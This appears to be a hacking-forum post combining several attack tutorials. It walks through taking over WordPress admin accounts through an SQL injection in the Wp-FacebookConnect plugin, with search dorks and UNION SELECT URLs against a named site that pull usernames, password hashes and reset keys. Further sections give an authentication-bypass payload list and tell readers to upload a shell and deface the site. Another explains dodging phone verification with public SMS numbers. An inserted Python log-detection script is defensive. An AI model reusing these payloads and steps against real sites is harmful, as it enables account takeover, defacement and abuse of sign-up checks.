Hacking Wordpress Without Hash Cracking


As the title says, im going to show u how to hack a wordpress site without cracking the hashes. Now this works with all the wordpress sqli exploits ever posted in any of its themes or plugins.
Point to remember: 
You cannot exploit the latest version of wordpress with this [3.4.2], which was released on 6th September 2012. Yea, u heard it right, released this month. Now there are still tons of websites out there which haven't been updated yet; all the previous versions can be exploited using this method.
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe

1) My Dork

There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is.
Code:
inurl:"/?fbconnect_action=myhome"

Now paste this code in google.com (one of my best frnds) and u will see no. of vulnerable websites.
2) Now the website im going to use here is
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&userid=2

Here the parameter userid is vulnerable to sqli. So lets see what we can get from the database. Im going to change the above URL to this:
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email)​,7,8,9,10,11,12+from+wp_users--

Now u can see we got the username with the email id
Now if i change the above URL to this :
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),​7,8,9,10,11,12+from+wp_users--

Im going to get the user name and the hashed password
Point to be noted here :  Im using concat here .. u can also use group_concat to get all the users again that would be ur knowledge how u use sqli.
Now we all know that wordpress hashes belong to the category MD5(wordpress)(different from simple MD5) and are very hard to crack but if ur mad u should think out of the box
So now follow the steps
a) Go to the login page of the wordpress site, in my case that would be:
Code:
http://masaru.ikeda.me/wp-login.php
b) Click on "Lost your password?"
c) Now the wordpress will ask me for the username or email for which i want to reset the password in my case that is 'masaru' so go ahead and enter the username .

d) Now look closely it says "Check your e-mail for the confirmation link."
e) Now what wordpress actually does is send an activation key to the email address of that user, and it sets the value of the activation key in the database as well. What u have to do is just get that key.
f) So now im going to change my URL to this to get the activation key
Code:
http://masaru.ikeda.me/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--

And u can see we got the activation key here u should note it down somewhere.
g) Now finally all we have to do is reset the password without going to the email address. For that im going to add this to my URL:
Code:
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

And im going to replace the KEYHERE with the activation key i got and the USERNAME HERE with the username which in my case is 'masaru' so my URL will be :
Code:
http://masaru.ikeda.me/wp-login.php?action=rp&key=cFn9vDsT3X2ZnW8vEda6&login=masaru

The wordpress will ask u for ur new password
Now go to the login page again and try the new password, and there u go, u got access to the panel.
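Seen from the server side, the steps above leave a recognisable sequence in the access log: a lost-password request, a request where the plugin's user id parameter is not an integer, then a reset-link visit, all from one client. The following Python is an added example (not part of the original post or of WordPress); the log lines, IP addresses and keys are constructed, and the combined-log layout is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (documentation IPs, placeholder keys, trimmed payload).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Sep/2012:10:00:01 +0000] "GET /?fbconnect_action=myhome&fbuserid=2 HTTP/1.1" 200 5120
192.0.2.44 - - [12/Sep/2012:10:00:30 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
192.0.2.44 - - [12/Sep/2012:10:05:12 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER1&login=alice HTTP/1.1" 200 2100
198.51.100.9 - - [12/Sep/2012:10:01:10 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0
198.51.100.9 - - [12/Sep/2012:10:01:40 +0000] "GET /?fbconnect_action=myhome&fbuserid=1+union+select+user_activation_key+from+wp_users-- HTTP/1.1" 200 5300
198.51.100.9 - - [12/Sep/2012:10:02:05 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER2&login=editor HTTP/1.1" 200 2100
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3}')
ID_PARAMS = ("userid", "fbuserid")      # the plugin parameters named on this page
CHAIN = ("reset_requested", "nonint_id", "reset_used")

def classify(method, url):
    """Map one request to an event name, or None if it is uninteresting."""
    parts = urlsplit(url)
    q = parse_qs(parts.query, keep_blank_values=True)   # also decodes '+' and %xx
    if parts.path.endswith("/wp-login.php"):
        action = q.get("action", [""])[0]
        if method == "POST" and action == "lostpassword":
            return "reset_requested"
        if action == "rp" and "key" in q:
            return "reset_used"
    if "fbconnect_action" in q:
        values = [v for p in ID_PARAMS for v in q.get(p, [])]
        if any(not re.fullmatch(r"[0-9]+", v) for v in values):
            return "nonint_id"          # a user id that is not a plain integer
    return None

def analyze(log_text):
    """Return IPs that sent non-integer ids, and IPs that completed the chain in order."""
    stage, probes, chains = {}, [], []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        event = classify(m.group(2), m.group(3)) if m else None
        if event is None:
            continue
        ip = m.group(1)
        if event == "nonint_id" and ip not in probes:
            probes.append(ip)
        if event == CHAIN[stage.get(ip, 0)]:     # out-of-order events are ignored
            stage[ip] = stage.get(ip, 0) + 1
            if stage[ip] == len(CHAIN):
                chains.append(ip)
                stage[ip] = 0
    return {"probes": probes, "chains": chains}

if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

Rejecting non-integer values of that parameter before it reaches the query removes the injection point; the chain check is for finding resets that already happened this way.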
WANT TO KNOW THE VERSION OF WORD PRESS ?
Now to chk quickly if a website is using the latest version 3.4.2 or a previous version, goto the login page and see if there is an option there to go back to the main page of the blog, like in my case: "-- Back to Digital Way of Living". If u see this option then this is not 3.4.2; if u don't see this option then it is 3.4.2. This trick is not legit, i figured it out and it is working for me.
Hope you will like this .. : ) 
IT WORKS PERFECT FOR ME CHECK OUT :
Hacked WordPress site : http://standzahra.id1945.com/

HACK WEBSITE'S ADMIN PANEL USING BASIC SQL INJECTION

You might have seen hackers hacking and defacing websites, editing them with their own stuff, making posts on websites etc. There are many methods of doing this. In this tutorial I will be showing you a very basic and simple SQLi (Structured Query Language Injection). I will show you how to find the website's admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find an upload option and upload your shell, then deface it.

inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php


Try to make your own dorks also, to get a better success rate:

Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1
Use the above mentioned login details and you will be into the admin panel of a website. It will not work for all the websites you will find, but will work on most of the websites.

Other InjecTion Queries:

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)


100 % Working Bypass Mobile Number Verification in Gmail,Fb,Yahoo,etc

First of all , Visit this website.

http://receive-sms-online.com/

In that website You can find some numbers.
Choose one number & click it.
Then Copy that mobile number & put that mobile number wherever verification code asks !!
Finally , u will receive verification code in that website..
Thats it !!!

This method will be very useful while u r creating new accounts like gmail, yahoo, etc.
This will receive almost all Verification Codes !!
Hope it will work fine ...